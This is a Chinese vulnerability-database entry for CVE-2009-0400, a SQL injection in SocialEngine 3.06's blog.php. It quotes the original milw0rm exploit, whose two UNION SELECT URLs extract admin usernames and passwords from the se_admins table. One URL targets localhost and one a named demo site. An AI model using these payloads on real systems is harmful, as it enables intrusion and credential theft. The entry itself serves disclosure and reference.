SocialEngine 'blog.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117306 漏洞类型 SQL注入
发布时间 2009-01-28 更新时间 2009-02-10
CVE编号 CVE-2009-0400 CNNVD-ID CNNVD-200902-047
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/7900
https://cxsecurity.com/issue/WLB-2009020111
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-047
|漏洞详情
SocialEngine3.06试验版中的blog.php存在SQL注入漏洞。远程攻击者可以借助类别id参数,执行任意的SQL指令。
|漏洞EXP
==================================================================================================================
=         SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM            = 
=         S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M            =      
+         SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M            +       
=             S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M            =      
=         SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M            = 
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=              	             Social Engine (blog.php) SQL Injection Vulnerability                                +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =          Discovered By: Snakespc  :::ALGERIAN HaCkEr:::               =     =   
                =                                                                                    =
                                    :::::Mail: snakespc@gmail.com:::::::             
                =                                                                                    =                                                                                   
                =            http://www.socialengine.net/demos.php  "blog.php"                       =
                  ===================================GAZA=============================================

Exploit:
http://localhost/blog.php?user=darkthronex&category_id=-5+UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_password),7,8,9,10,11,12,13,14,15,16,17,18+from+se_admins/*
********
demo:
http://www.socialenginedev.com/blog.php?user=darkthronex&category_id=-5+UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_password),7,8,9,10,11,12,13,14,15,16,17,18+from+se_admins/*
============================================================== ALLAH AKBAR=========================================================

Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: SuB-ZeRo
ALL www.SnakespC.com/sc >>>>dz-security.net >>>> Members 
Str0ke ....Milw0rm
=====================================================GAZA=========================================================================

# milw0rm.com [2009-01-28]
|参考资料

来源:XF
名称:socialengine-blog-sql-injection(48316)
链接:http://xforce.iss.net/xforce/xfdb/48316
来源:BID
名称:33495
链接:http://www.securityfocus.com/bid/33495
来源:MILW0RM
名称:7900
链接:http://www.milw0rm.com/exploits/7900
来源:SECUNIA
名称:33701
链接:http://secunia.com/advisories/33701
来源:OSVDB
名称:51644
链接:http://osvdb.org/51644